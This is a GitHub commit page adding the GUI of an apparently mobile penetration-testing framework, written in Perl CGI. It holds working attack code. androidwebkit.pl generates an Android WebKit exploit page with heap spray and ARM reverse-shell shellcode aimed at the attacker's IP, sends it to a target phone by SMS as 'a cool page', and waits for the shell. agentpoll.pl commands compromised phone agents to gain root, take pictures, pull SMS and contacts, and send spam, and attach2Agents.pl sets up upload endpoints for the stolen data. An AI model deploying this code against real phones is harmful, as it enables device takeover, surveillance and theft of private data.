Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

gui back in may god and infosec forgive me

  • Loading branch information...
commit 572a20766359b2175b22111127bd772428ab10ef 1 parent ee55179
@georgiaw authored
Showing with 3,576 additions and 0 deletions.
  1. BIN  frameworkgui/AndroidAgent.apk
  2. +47 −0 frameworkgui/CSAttack.pl
  3. +44 −0 frameworkgui/SEAttack.pl
  4. +488 −0 frameworkgui/agentpoll.pl
  5. +113 −0 frameworkgui/androidwebkit.pl
  6. +95 −0 frameworkgui/attach2Agents.pl
  7. +153 −0 frameworkgui/attachMobileModem.pl
  8. BIN  frameworkgui/bulb.jpg
  9. +21 −0 frameworkgui/config
  10. +61 −0 frameworkgui/createDatabase.pl
  11. +45 −0 frameworkgui/directdownload.pl
  12. +65 −0 frameworkgui/escalatePrivileges.pl
  13. +108 −0 frameworkgui/getContacts.pl
  14. +94 −0 frameworkgui/getDatabase.pl
  15. +33 −0 frameworkgui/guessPassword.pl
  16. +66 −0 frameworkgui/guessattack.pl
  17. BIN  frameworkgui/iphone.deb
  18. +43 −0 frameworkgui/lib/SPF.pm
  19. BIN  frameworkgui/littleBulb.jpg
  20. +547 −0 frameworkgui/menu.pl
  21. +97 −0 frameworkgui/myJavaScript.js
  22. +4 −0 frameworkgui/passwd
  23. BIN  frameworkgui/picture.jpg
  24. +401 −0 frameworkgui/poller.pl
  25. +33 −0 frameworkgui/remoteAttack.pl
  26. +9 −0 frameworkgui/search.pl
  27. +65 −0 frameworkgui/sendSMS.pl
  28. +54 −0 frameworkgui/sshattack.pl
  29. +239 −0 frameworkgui/styles.css
  30. +60 −0 frameworkgui/takePic.pl
  31. +20 −0 frameworkgui/test.pl
  32. +118 −0 frameworkgui/viewInfo.pl
  33. +232 −0 frameworkgui/viewInfo2.pl
  34. +221 −0 frameworkgui/viewInfo3.pl
View
BIN  frameworkgui/AndroidAgent.apk
Binary file not shown
View
47 frameworkgui/CSAttack.pl
@@ -0,0 +1,47 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$exploit = $FORM{"exploit"};
+$hPath = $FORM{"hostingPath"};
+$fileName = $FORM{"fileName"};
+$phNo2Attack = $FORM{"phNo2Attack"};
+$modemNo = $FORM{"modemNoDD2"};
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT id FROM modems WHERE number = ?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+@exec = (qw(perl androidwebkit.pl),$hPath,$fileName,$phNo2Attack,$modem);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+
+
+ }
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
View
44 frameworkgui/SEAttack.pl
@@ -0,0 +1,44 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$platform = $FORM{"platformDD2"};
+$path = $FORM{"hostingPath"};
+$filename = $FORM{"fileName"};
+$number = $FORM{"phNo2Attack"};
+$modemNo = $FORM{"modemNoDD2"};
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT id FROM modems WHERE number = ?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+@exec = (qw(perl directdownload.pl),$path,$filename,$number,$platform,$modem);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+ }
+#print $startcommand;
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
View
488 frameworkgui/agentpoll.pl
@@ -0,0 +1,488 @@
+#!/usr/bin/perl
+use DBI;
+use Cwd;
+use Expect;
+use IO::Socket;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+$ipaddress = $Variables{"IPADDRESS"};
+$webserver = $Variables{"WEBSERVER"};
+$path = $ARGV[0];
+$key = $ARGV[1];
+$id = $ARGV[2];
+while(1)
+ {
+ $fullpath5 = $webserver . $path . "/putfunc";
+ die "Couldn't find $fullpath5!" unless -r $fullpath5;
+ open(PUTFILE, "<",$fullpath5) or die "Couldn't open $fullpath5 for reading! ($!)";
+ $line= <PUTFILE>;
+ close(PUTFILE);
+ open(PUTFILE2, ">",$fullpath5) or die "Couldn't open $fullpath5 for writing! ($!)";;
+ print PUTFILE2;
+ close(PUTFILE2);
+ @split = split(/ /, $line);
+ if (@split[0] eq $key)
+ {
+ if (@split[1] eq "ROOT")
+ {
+ $delivery = @split[2];
+ chomp($delivery);
+ $command = $key . " " . "ROOT";
+ if ($delivery eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ if ($line eq "Root Succeeded")
+ {
+ $sql = $dbh->prepare("UPDATE data SET root = ? WHERE id = ?");
+ $sql->execute("yes",$id);
+ }
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ if ($delivery eq "SMS")
+ {
+ $modem = @split[3];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number FROM agents WHERE id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ if ($line eq "Root Succeeded")
+ {
+ $sql = $dbh->prepare("UPDATE data SET root = ? WHERE id = ?");
+ $sql->execute("yes",$id);
+ }
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+
+ }
+
+
+ }
+ elsif (@split[1] eq "PICT")
+ {
+ $delivery = @split[2];
+ chomp($delivery);
+ $command = $key . " " . "PICT";
+ if ($delivery eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 30;
+ $picturefile = $webserver . $path . "/picture.jpg";
+ open(PICTURE, "<",$picturefile) or die "Couldn't open $picturefile for reading! ($!)";
+ if (!(-z PICTURE))
+ {
+ $command = "cp" . " " . $picturefile . " " . ".";
+ system($command);
+ $picturedir = getcwd();
+ $picture = $picturedir . "/" . "picture.jpg";
+ $sql = $dbh->prepare("UPDATE data SET picture = ? WHERE id = ?");
+ $sql->execute($picture,$id);
+ close(PICTURE);
+ open(PICTURE2, ">",$picturefile) or die "Couldn't open $picturefile for writing! ($!)";
+ print PICTURE2 "";
+ close(PICTURE2);
+ }
+
+ }
+ if ($delivery eq "SMS")
+ {
+ $modem = @split[3];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+ $sql = $dbh->prepare("SELECT controlkey from modems where id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+ $sql = $dbh->prepare("SELECT number from agents where id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep(60);
+ $picturefile = $webserver . $path . "/picture.jpg";
+ open(PICTURE, "<",$picturefile) or die "Couldn't open $picturefile for reading! ($!)";
+ if (!(-z PICTURE))
+ {
+ $command = "cp" . " " . $picturefile . " " . ".";
+ system($command);
+ $picturedir = getcwd();
+ $picture = $picturedir . "/" . "picture.jpg";
+ $sql = $dbh->prepare("UPDATE data SET picture = ? WHERE id = ?");
+ $sql->execute($picture,$id);
+ close(PICTURE);
+ open(PICTURE2, ">",$picturefile) or die "Couldn't open $picturefile for writing! ($!)";
+ print PICTURE2 "";
+ close(PICTURE2);
+ }
+
+ }
+ }
+ elsif (@split[1] eq "SMSS")
+ {
+ $deliverymethod = @split[2];
+ $returnmethod = @split[3];
+ chomp($returnmethod);
+ if ($returnmethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+ $command = $key . " " . "SMSS" . " " . $returnmethod;
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ $sql->execute($line,$id);
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ print "SMS";
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+ $sql = $dbh->prepare("SELECT number FROM agents WHERE id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ $sql->execute($line,$id);
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ }
+ if ($returnmethod eq "HTTP")
+ {
+ $command = $key . " " . "SMSS" . " " . "WEB";
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 30;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ $sql->execute($line,$id);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path from modems where id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number FROM agents WHERE id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+
+ sleep 60;
+
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ }
+
+ }
+ elsif (@split[1] eq "CONT")
+ {
+ $deliverymethod = @split[2];
+ $returnmethod = @split[3];
+ chomp($returnmethod);
+ if ($returnmethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems where id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+ $command = $key . " " . "CONT" . " " . $returnmethod;
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+
+ $insertquery = "UPDATE data SET contacts = ? WHERE id = ?";
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number from agents where id=?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET contacts=? WHERE id=?");
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+
+
+ }
+
+ }
+
+ if ($returnmethod eq "HTTP")
+ {
+ $command = $key . " " . "CONT" . " " . "WEB";
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 30;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET contacts = ? WHERE id = ?");
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number from agents where id=?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT type from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $type2 = @rows[0];
+
+ if ($type2 eq "app")
+ {
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+
+ $sql = $dbh->prepare("UPDATE data SET contacts=? WHERE id=?");
+ $sql->execute($line,$id);
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+
+ }
+ }
+
+ }
+ elsif (@split[1] eq "SPAM")
+ {
+ $modem = @split[2];
+ $sendnumber = @split[4];
+ $deliverymethod = @split[3];
+ $splitlength = @split;
+ $end = $splitlength - 1;
+ $sendmessage = @split[5];
+ if ($end > 5)
+ {
+ for ($i = 6; $i<=$end; $i++)
+ {
+ $sendmessage .= " ";
+ $sendmessage .= @split[$i];
+ }
+ }
+ $command = $key . " " . "SPAM" . " " . $sendnumber . " " . $sendmessage;
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT path from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT type from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $type2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number from agents where id=?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ chomp($type2);
+ if ($type2 eq "app")
+ {
+ $control = $webserver . $path2 . "/getfunc";
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ }
+ }
+
+
+ }
+
+
+ }
+}
+
View
113 frameworkgui/androidwebkit.pl
@@ -0,0 +1,113 @@
+#!/usr/bin/perl
+use Cwd;
+use DBI;
+use Expect;
+use IO::Socket;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$webserver = $Variables{"WEBSERVER"};
+ $ipaddress = $Variables{"IPADDRESS"};
+ $shellipaddress = $Variables{"SHELLIPADDRESS"};
+ $path = $ARGV[0];
+ $filename = $ARGV[1];
+ $number = $ARGV[2];
+ $modem = $ARGV[3];
+ $link = "http://" . $ipaddress . $path . $filename;
+ $fullpath = $webserver. $path;
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $ipaddresscopy = $shellipaddress;
+ @octets = split(/\./, $ipaddresscopy);
+ $out1 = pack "c", @octets[0];
+ $hex1 = unpack "H2" , $out1;
+ $out2 = pack "c", @octets[1];
+ $hex2 = unpack "H2" , $out2;
+ $out3 = pack "c", @octets[2];
+ $hex3 = unpack "H2" , $out3;
+ $out4 = pack "c", @octets[3];
+ $hex4 = unpack "H2" , $out4;
+ $sploitfile = $webserver . $path . $filename;
+ $command8 = "touch " . $sploitfile;
+ system($command8);
+ $command9 = "chmod 777 " . $sploitfile;
+ system($command9);
+ open(SPLOITFILE, ">",$sploitfile) or die "Couldn't open $sploitfile for writing! ($!)";
+ print SPLOITFILE "<html>\n";
+ print SPLOITFILE "<head>\n";
+ print SPLOITFILE "<script>\n";
+ print SPLOITFILE "var ip = unescape(\"\\u" . $hex2 . $hex1 . "\\u" . $hex4 . $hex3 . "\");\n";
+ print SPLOITFILE "var port = unescape(\"\\u3930\");\n";
+ print SPLOITFILE "function trigger()\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "var span = document.createElement(\"div\");\n";
+ print SPLOITFILE "document.getElementById(\"BodyID\").appendChild(span);\n";
+ print SPLOITFILE "span.innerHTML = -parseFloat(\"NAN(ffffe00572c60)\");\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "function exploit()\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "var nop = unescape(\"\\u33bc\\u0057\");\n";
+ print SPLOITFILE "do\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "nop+=nop;\n";
+ print SPLOITFILE "} while (nop.length<=0x1000);\n";
+ print SPLOITFILE "var scode = nop+unescape(\"\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002\");\n";
+ print SPLOITFILE "scode += port;\n";
+ print SPLOITFILE "scode += ip;\n";
+ print SPLOITFILE "scode += unescape(\"\\u2000\\u2000\");\n";
+ print SPLOITFILE "target = new Array();\n";
+ print SPLOITFILE "for(i = 0; i < 0x1000; i++)\n";
+ print SPLOITFILE "target[i] = scode;\n";
+ print SPLOITFILE "for (i = 0; i <= 0x1000; i++)\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "document.write(target[i]+\"<i>\");\n";
+ print SPLOITFILE "if (i>0x999)\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "trigger();\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "</script>\n";
+ print SPLOITFILE "</head>\n";
+ print SPLOITFILE "<body id=\"BodyID\">\n";
+ print SPLOITFILE "Enjoy!\n";
+ print SPLOITFILE "<script>\n";
+ print SPLOITFILE "exploit();\n";
+ print SPLOITFILE "</script>\n";
+ print SPLOITFILE "</body>\n";
+ print SPLOITFILE "</html>\n";
+ close(SPLOITFILE);
+
+ $sql = $dbh->prepare("SELECT path from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool page: " . $link;
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ $vulnerable = "no";
+ $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
+ if ($data_socket = $socket->accept())
+ {
+ $data="/system/bin/id\n";
+ print $data_socket $data;
+ $data=<$data_socket>;
+ print $data;
+ close($data_socket);
+ $vulnerable = "yes";
+ }
+
+
+
+ $sql = $dbh->prepare("INSERT INTO client (id,number,exploit,vuln) VALUES (DEFAULT,?,?,?)");
+ $sql->execute($number,"webkit",$vulnerable);
View
95 frameworkgui/attach2Agents.pl
@@ -0,0 +1,95 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$number1 = $FORM{"agentPhNo"};
+$number21 = $FORM{"controlPhNo"};
+$path1 = $FORM{"agentURLPath"};
+$key1 = $FORM{"agentControlKey"};
+$platform1 = $FORM{"platformDD1"};
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+ $webserver = $Variables{"WEBSERVER"};
+ $fullpath = $webserver. $path;
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $controlfile = $fullpath . "/control";
+ $command2 = "touch " . $controlfile;
+ system($command2);
+ $command3 = "chmod 777 " . $controlfile;
+ system($command3);
+ $picturefile = $fullpath . "/picture.jpg";
+ $command4 = "touch " . $picturefile;
+ system($command4);
+ $command5 = "chmod 777 " . $picturefile;
+ system($command5);
+ $textfile = $fullpath . "/text.txt";
+ $command6 = "touch " . $textfile;
+ system($command6);
+ $command7 = "chmod 777 " . $textfile;
+ system($command7);
+ $pictureupload = $fullpath . "/pictureupload.php";
+ $command8 = "touch " . $pictureupload;
+ system($command8);
+ $command9 = "chmod 777 " . $pictureupload;
+ system($command9);
+ $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
+ open(PICFILE, ">",$pictureupload) or die "Couldn't open $pictureupload for writing! ($!)";
+ print PICFILE $pictureuploadtext;
+ close(PICFILE);
+ $textupload = $fullpath . "/textuploader.php";
+ $command10 = "touch " . $textupload;
+ system($command10);
+ $command11 = "chmod 777 " . $textupload;
+ system($command11);
+ $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(TEXTFILE, ">",$textupload) or die "Couldn't open $textupload for writing! ($!)";
+ print TEXTFILE $textuploadtext;
+ close(TEXTFILE);
+ $controlupload = $fullpath . "/controluploader.php";
+ $command12 = "touch " . $controlupload;
+ system($command12);
+ $command13 = "chmod 777 " . $controlupload;
+ system($command13);
+ $controluploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('control','wb');\nfwrite(\$file, \$base);\n?>";
+ open(CONTROLFILE, ">",$controlupload) or die "Couldn't open $controlupload for writing ($!)";
+ print CONTROLFILE $controluploadtext;
+ close(CONTROLFILE);
+ $putfile = $fullpath . "/putfunc";
+ $command14 = "touch " . $putfile;
+ system($command14);
+ $command15 = "chmod 777 " . $putfile;
+ system($command15);
+ $sql = $dbh->prepare("INSERT INTO agents (id,number,path,controlkey,controlnumber,platform) VALUES (DEFAULT,?,?,?,?,?)");
+ $sql->execute($number1,$path1,$key1,$number21,$platform1);
